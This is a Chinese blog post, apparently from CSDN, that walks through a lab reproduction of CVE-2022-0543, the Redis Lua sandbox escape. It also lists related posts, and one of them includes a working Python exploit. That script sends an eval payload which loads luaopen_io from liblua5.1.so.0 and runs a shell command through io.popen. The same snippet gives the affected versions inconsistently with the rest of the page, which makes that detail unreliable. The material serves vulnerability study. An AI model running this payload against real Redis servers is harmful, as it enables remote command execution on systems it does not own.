CVE-2022-0543(Redis 沙盒逃逸漏洞)

原创 已于 2025-06-30 15:04:48 修改 · 10w+ 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#redis #数据库 #缓存 #网络安全 #安全

于 2023-11-23 11:37:50 首次发布
本文讲述了Redis中的CVE-2022-0543漏洞,攻击者可通过恶意Lua脚本利用loadlib函数加载liblua5.1.so.0,获取io库权限执行命令。漏洞利用包括尝试访问外部资源和读取系统文件以获取flag。

简介

CVE-2022-0543是一个与Redis相关的安全漏洞。在Redis中,用户连接后可以通过eval命令执行Lua脚本,但在沙箱环境中脚本无法执行命令或读取文件。然而,攻击者可以利用Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库liblua5.1.so.0里的导出函数luaopen_io,从而获得io库并执行命令。

为了利用这个漏洞,攻击者需要在Redis客户端中输入恶意payload,其中whoami是要执行的命令,也可以根据需求更换其他命令。

漏洞利用

1.打开靶场

2.尝试访问跳转百度

访问成功

3.尝试读取系统文件

4.读取flag

BTY@BTY
关注
CVE-2022-0543 Redis逃逸漏洞
weixin_45715461的博客
07-01 3801
CVE-2022-0543 Redis逃逸漏洞
CVE-2022-0543 Redis逃逸漏洞复现(CVE-2022-0543)
XZ_______的博客
04-21 1920
漏洞复现
vulhub漏洞复现-redis未授权访问getshell总结 (CVE-2022-0543
最新发布
2302_79841575的博客
09-12 762
摘要:本文演示了Redis未授权访问漏洞的利用过程。漏洞影响版本低于6.x,主要由于未配置访问控制和密码认证所致。攻击者通过nmap扫描发现靶机开放6379端口后,使用redis-rogue-getshell工具建立主从复制连接,成功在目标系统执行命令。复现过程包括环境搭建、未授权连接验证和利用主从复制模式实现远程代码执行,展示了该高危漏洞的实际危害。
CVE-2022-0543
sinat_25635183的博客
03-25 788
2、CVE-2022-0543Redis逃逸漏洞Redis Labs 是一家专注于 Redis 数据库的企业公司,提供企业级的 Redis 产品和服务。出现一个新的网页,直接跳转到iana的官网(IANA(Internet Assigned Numbers Authority)是互联网分配号码局,是负责管理全球互联网协议参数的权威组织之一。根据前面的增加链接内容的操作,可以尝试一下将iana网站的链接加在靶场链接的后面。注意:每个人可能打开的网页链接不一样,需要根据自己的情况来操作后面的步骤。
Redis逃逸漏洞(CVE-2022-0543)复现以及流量特征分析
xhscxj的博客
02-03 2290
Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸箱执行任意命令。
CVE-2022-0543redis逃逸
huayimy的博客
02-03 1073
CVE-2022-0543redis逃逸借助Lua箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。运行完docker-compose后,打开我们的redis就是我们的漏洞环境啦
【vulhub】redis CVE-2022-0543redis逃逸
qq_51143406的博客
02-26 695
CVE-2022-0543 redis逃逸 漏洞复现
Redis-未授权访问-CVE-2022-0543 (redis逃逸)
MateSnake的博客
05-13 1404
Redis-未授权访问-CVE-2022-0543 (redis逃逸)
CVE-2022-0543redis逃逸)详细漏洞复现
没事我溜达
03-25 9671
参考:vulhub/README.zh-cn.md at master · vulhub/vulhub · GitHub Redis Lua绕过命令执行(CVE-2022-0543Redis是著名的开源Key-Value数据库,其具备在箱中执行Lua脚本的能力。 Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸箱执行任意命令。 直接写复现全过程吧
Redis 逃逸漏洞复现(CVE-2022-0543
hicode0101的博客
01-17 826
我们借助Lua箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。值得注意的是,不同环境下的liblua库路径不同,你需要指定一个正确的路径。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸箱执行任意命令。
cve_2022_0543-redis漏洞复现 vulfocus
c0529的博客
06-10 959
漏洞的存在是因为Debian/Ubuntu中的Lua库是作为动态库提供的。自动填充了一个package变量,该变量又允许访问任意 Lua 功能。
CVE-2022-0543(lua绕过命令执行)复现
kriesa的博客
07-13 777
CVE-2022-0543复现
Redis逃逸漏洞 RCE(CVE-2022-0543)复现+getshell
xiaobai_20190815的博客
03-09 1974
Redis逃逸漏洞 RCE(CVE-2022-0543)复现+getshell
CVE-2022-0543 Redis Lua 逃逸 RCE
qq_50854662的博客
01-05 496
CVE-2022-0543 Redis Lua 逃逸 RCE
CVE-2022-0543 Redis Lua绕过 命令执行
Foreverlove112的博客
09-22 699
CVE-2022-0543 Redis Lua绕过 命令执行
Redis Lua绕过命令执行(CVE-2022-0543
jiji_king的博客
07-07 372
个人笔记
简单漏洞CVE-2022-0543 Redis Lua 绕过
栉风沐雪的博客
01-29 1230
CVE-2022-0543 Redis Lua 绕过漏,在Lua箱中遗留了一个对象package,攻击者可以利用package对象提供的加载动态链接库liblua里的函数逃逸redis在用户连接后可以通过eval命令执行Lua脚本,但是脚本跑在箱中,正常情况下无法执行命令读取文件,所以这个漏洞的本质是箱绕过。一般情况下,redis运行在6379(默认端口),而在此镜像中映射于36770端口,可以使用nmap扫描端口发现相应服务。影响范围:Debian系得linux发行版本+Ubuntu。
nodejs逃逸漏洞
weixin_52635036的博客
08-05 697
这个原因就是因为primitive types,数字、字符串、布尔等这些都是primitive types,他们的传递其实传递的是值而不是引用,所以在内虽然你也是使用的m,但是这个m和外部那个m已经不是一个m了,所以也是无法利用的。如果是值引用,外部的m和n和内部的mn是两个数据,如果是类型引用,那就是外部的m把内存地址传给内部,内部直接调用外部的内存地址,那这俩就是一样的。只要我们能在箱内部,找到一个箱外部的对象,借助这个对象内的属性即可获得箱外的函数,进而绕过箱。
cve-2022-0543漏洞复现
02-28
### CVE-2022-0543 漏洞详情 CVE-2022-0543Redis 中的一个逃逸漏洞,允许攻击者通过特定的 Lua 脚本执行任意系统命令。Redis 使用 Lua 解释器来处理脚本操作,默认情况下启用了安全机制以防止潜在危险的操作。然而,在某些配置下,该可以被绕过,从而导致严重的安全隐患。 #### 影响版本 受影响的主要版本包括但不限于 Redis 版本 6.x 和部分 7.x 的早期版本[^2]。 ### 复现环境搭建 为了成功复现此漏洞,需准备如下条件: - 安装并运行易受攻击版本的 Redis 实例。 - 配置 Redis 不带任何身份验证措施(即禁用密码保护),以便于测试过程中不受阻碍地连接到服务器。 - 准备好能够发送自定义请求的客户端工具或编写相应的 Python/Shell 脚本来模拟攻击行为。 ### 漏洞利用过程 下面是一个简单的 Python 脚本用于展示如何触发这个漏洞: ```python import redis def exploit_redis(): r = redis.Redis(host='localhost', port=6379, db=0) payload = ''' eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0 ''' result = r.execute_command(payload) print(result.decode()) if __name__ == '__main__': exploit_redis() ``` 上述代码尝试加载外部库 `liblua5.1.so` 并调用其中的方法打开管道执行 Linux 命令 `id` 来获取当前用户的 UID/GID 信息作为演示目的。实际应用中可以根据需求替换为其他恶意指令。 请注意,以上内容仅限学习研究用途,请勿非法入侵他人计算机信息系统!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值